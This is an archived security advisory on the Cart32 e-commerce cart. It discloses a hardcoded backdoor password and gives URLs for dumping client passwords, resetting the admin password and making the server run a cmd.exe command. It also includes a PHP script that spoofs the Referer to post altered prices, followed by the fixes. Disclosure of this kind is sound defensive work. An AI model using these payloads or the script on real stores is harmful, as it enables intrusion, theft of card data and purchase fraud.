COMMAND

    Cart32

SYSTEMS AFFECTED

    Any Win32 based web server using Cart32

PROBLEM

    Following is  based on  Cerberus Information  Security Advisory by
    David  and  Mark  Litchfield.   The  Cerberus  Security  Team  has
    discovered  a  serious  security  hole  in  McMurtrey/Whitaker   &
    Associates, Inc's Win32  e-Commerce shopping cart,  namely, Cart32
    that  can  only  be  described  as  a  blatant  backdoor.   Within
    cart32.exe, the main file that provides the cart's  functionality,
    there is a secret hidden password  that can be used to gain  vital
    information such as  other passwords and  using these an  attacker
    can  modify  the  shopping  cart's  properties  so  that  arbitary
    commands  may  be  run  on  the  server  as well as gain access to
    customers'  credit  card  details,  shipping  addresses  and other
    highly sensitive information.

    Within cart32.exe there is a secret backdoor password of  "wemilo"
    (found  at   file  offset   0x6204h)  known   internally  as   the
    Cart32Password.  With knowledge  of this password an  attacker can
    go to one of several undocument URLs such as

        http://charon/scripts/cart32.exe/cart32clientlist

    and obtain a list the passwords for each Cart32 client. (A  client
    is essentially a shop site).   Although these passwords appear  to
    be  hashed  they  can  still  be  used.   For  example they can be
    embedded in a specially crafted  URL that will allow the  attacker
    to prime the server to run  an arbitrary command when an order  is
    confirmed:

        http://charon/scripts/c32web.exe?TabName=Cart32%2B&Action=Save+Cart32%2B+Tab&SaveTab=Cart32%2B&Client=foobar&ClientPassword=e%21U%23_%25%28%5D%5D%26%25*%2B-a&Admin=&AdminPassword=&TabToSave=Cart32%2B&PlusTabToSave=Run+External+Program&UseCMDLine=Yes&CMDLine=cmd.exe+%2Fc+dir+%3E+c%3A%5Cfile.txt

    This URL will set the cart's properties to spawn a shell,  perform
    a directory listing and pipe the output to a file called  file.txt
    on the root  of the C:  drive when an  order is confirmed.   After
    doing this  the attacker  would then  create a  spurious order and
    confirm  it  thus  executing  the  command.  (Please note that the
    above  URL  is  pertinent  only  to  an internal Cerberus server -
    password  details  and  client  info  would  need to be changed to
    reflect the site in question).

    Further to  this the  Cerberus Security  Team has  found what  is,
    perhaps, a second  backdoor.  By  going directly to  the following
    URL

        http://charon/scripts/c32web.exe/ChangeAdminPassword

    it  is  possible  to  change  the administrative password with out
    knowledge of the previous one.

    Because  the   'wemilo'  string   is  unicode   try  looking   for
    "w\0e\0m\0i\0l\0o\0".   Also, there's  a version  of 'strings' for
    NT  that  does  both  ASCII  strings  and  Unicode strings over at
    www.sysinternals.com in  the 'miscellaneous'  section of  their NT
    stuff.

    Another interesting Cart32 command was mentioned by Cassius.  Ex:

        http://example.com/cgi-bin/cart32.exe/expdate

    This causes  an error  and displays  a debugging  page with server
    variables,  the  contents  of  the Cart32 administration directory
    and sometimes,  the contents  of cgi-bin.   This makes  it easy to
    spot misconfigured Cart32  installs (customer databases  installed
    to the cgi-bin directory.)  You could fix this one in a  hexeditor
    by changing the /EXPDATE string to something random.

    Bunny69  added  more.   While  messing  around  with  Cart32,   he
    discovered the following bug (existance of such bugs in eCarts  is
    well known, but it was never  discovered in Cart32).  When a  user
    clicks on a product  he's interested in, he  sees a form where  he
    can add this product  to his cart, the  problem is that the  price
    of the product is passed to  the Cart32 system by a "hidden"  HTML
    tag  named  Price.   A  simple  edit  of  this field will permit a
    malicious attacker to buy products in the desired price  (probably
    $0).  This was tested on versions 2.5a and 3.0.

    Exploiting this hole is extremly easy, one should simply save  the
    web page of the desired product  in his hard drive, edit the  HTML
    source, change the  price to 0,  browse the page  again and submit
    the form  - voila,  a nice  new Porche  911 for  the nice price of
    $1.99.

    cart32.phtml (a PHP exploit for Cart32 Stupidity):

    <?php
    /*
    
       Caution - long lines ahead.
    
       Cart32.phtml
       Bypass lame "security" options by providing our own referer
       and tainted data via POST.
       cdi@thewebmasters.net
    
      PostToHost()
        Heavily modified version of Rasmus' PostToHost function
        It's generic enough to handle any method containing
        just about any data.
    
        $data: urlencoded QUERY_STRING format
        $cookie: urlencoded cookie string format (name=value;name=value).
    */
    
    function PostToHost($host="",$port="80",$method="POST",$path="",$data="",$refer="",$client="",$cookie="")
    {
        $fp = fsockopen($host,$port);
        if(!$fp) { echo "Failed to open port"; exit; }
        fputs($fp, "$method $path HTTP/1.0\n");
        if($cookie != "") { fputs($fp, "Cookie: $cookie\n"); }
        if($refer  != "") { fputs($fp, "Referer: $refer\n"); }
        if($client != "") { fputs($fp, "User-Agent: $client\n"); }
        if($method == "POST")
        {
            fputs($fp, "Content-type: application/x-www-form-urlencoded\n");
            fputs($fp, "Content-length: " . strlen($data) . "\n");
        }
        fputs($fp, "Connection: close\n\n");
        if($method == "POST")
        {
            fputs($fp, "$data\n");
        }
        $results = "";
        while(!feof($fp))
        {
            $results .= fgets($fp, 1024);
        }
        fclose($fp);
        return $results;
    }
    
    // Whee, now all we need to do is set up the data
    $host = 'www.cart32.com';
    $port = 80;
    $method = "POST";
    $path = '/cgi-bin/cart32.exe/justsocks-AddItem';
    $refer = 'www.IGuessYouDontTakeYourOwnAdvice..com';
    // And even if they did, we could set the Referer to match
    // anything we wanted.
    
    $client = 'CDI Spoof (v1.0)';
    $cookie = "";
    
    // Real price of this product was $6.99
    $data = 'Price=1000.56&Item=Wigwam+Triathlete+Ultra-Lite&PartNo=F6092&Qty=5&p1=XL&t1=d-Size%3BS%3BM%3BL%3BXL&p2=Black&t2=d-Color%3BBlack%3BWhite';
    
    // And now call the function
    
    $raw = PostToHost($host,$port,$method,$path,$data,$refer,$client,$cookie);
    
    print "<PRE>\n\n";
    print " Host: $host\n Port: [$port]\n Method: [$method]\n Path: [$path]\n";
    print " Referer: [$refer]\n Client: [$client]\n Cookie: [$cookie]\n";
    print " Data: [$data]\n";
    print "</PRE>\n";
    print "<P>Results of operation:<BR><HR NOSHADE><P>\n";
    print "$raw\n";
    ?>

    The JustSocks site is real and is hosted by Cart32.com - the  data
    sent above resulted in the following: (html removed)

        Host: www.cart32.com
        Port: [80]
        Method: [POST]
        Path: [/cgi-bin/cart32.exe/justsocks-AddItem]
        Referer: [www.IGuessYouDontTakeYourOwnAdvice.com]
        Client: [CDI Spoof (v1.0)]
        Cookie: []
        Data: [Price=1000.56&Item=Wigwam+Triathlete+Ultra-Lite&PartNo=F6092&Qty=5&p1=XL&t1=d-Size%3BS%3BM%3BL%3BXL&p2=Black&t2=d-Color%3BBlack%3BWhite]

    Results of operation:

        HTTP/1.1 200 OK
        Server: Microsoft-IIS/4.0
        Date: Tue, 23 May 2000 20:54:04 GMT
        Content-type: text/html
        Set-Cookie: Cart32-JUSTSOCKS=.3478662; path=/; expires=Thursday, 25-May-2000 01:01:01 GMT

SOLUTION

    Cerberus  recommends   that  the   following  steps   be  actioned
    immediately.  Cerberus has tested this in their labs and the  Cart
    functionality will not be broken by following these steps.

        1) Download a Hex Editor such as UltraEdit and edit cart32.exe
           changing the  "wemilo" password  to something  else.   This
           will address the first issue.

        2) Because c32web.exe is the administration program for Cart32
           only site administrators will need  access to it.  Set  the
           NTFS permissions on this  file so that only  Administrators
           have access to  it.  This  way anyone attempting  to access
           this file to change the admin password will be prompted for
           an NT account  and password.   For other "servers"  such as
           Windows 95 and 98 Cerberus recommends removing this file.

    Dildog and Weld Pond from  L0pht made following fix.   The Cartfix
    program is  a quick  temporary solution  for users  waiting for  a
    permanent  fix  from  the  cart32  vendor,  McMurtrey/Whitaker   &
    Associates.  The Cartfix program searches for the secret  backdoor
    password in the cart32.exe program  and replaces it with a  random
    backdoor  password.   It  changes   the  ACL  on  the   c32web.exe
    administration program so that  anonymous users cannot change  the
    administrator password for cart32.  This ACL fix will only work on
    Windows NT/2000 systems.

    This patch does  in no way  make the cart32  software secure.   It
    merely  eliminates  the  two  problems  detailed  in  the Cerberus
    Information  Security  advisory.   The  security  problems in this
    software are  at a  basic design  level and  may take several days
    for the vendor to fix.   This patch will allow users of  cart32 to
    be safe  from these  high risk  vulnerabilies while  awaiting this
    fix.  Executable file:

        http://www.l0pht.com/advisories/cartfix.exe

    Source code:

        http://www.l0pht.com/advisories/cartfixsrc.zip

    You must be logged on as administrator to run the program.   Press
    the  browse  button  and  select  the  directory that contains the
    cart32 software.  This is  usually cgi-bin or scripts.   After the
    directory  is  selected  press   'patch'  to  patch  your   cart32
    installation.

    As for what Bunny69 discovered, that "hole" is avoided by  setting
    "Domain(s)  to  Accept  Orders"  in  the  'Advanced'  Tab.  If the
    referral URL  does not  match one  of those  domains provided, the
    order will not go through.  To quote from Cart32 v3.0 Help:

        Domain(s) To Accept Orders
        This is a  list of domain  names or ip  addresses in which  to
        accept orders.   This would be  your website. This  prevents a
        user from  downloading a  page containing  product information
        and  then  changing  the  price  or  other  parameter and then
        submitting the  order.   You can  one domain  name or  several
        separated by commas.   Ex.  www.cart32.com or  www.cart32.com,
        cart32.com, 207.150.83.60 (END QUOTE)

    Of course, there are ways to go around the referral check.   Which
    is why the "Require POST" option exists, which means the form must
    be submitted using  'POST' and not  'GET'.  Again,  there are ways
    to avoid  that check  (for example,  creating your  own simplistic
    "web browser").  However, all Cart32 users should skim through the
    orders to see any noticeable price errors.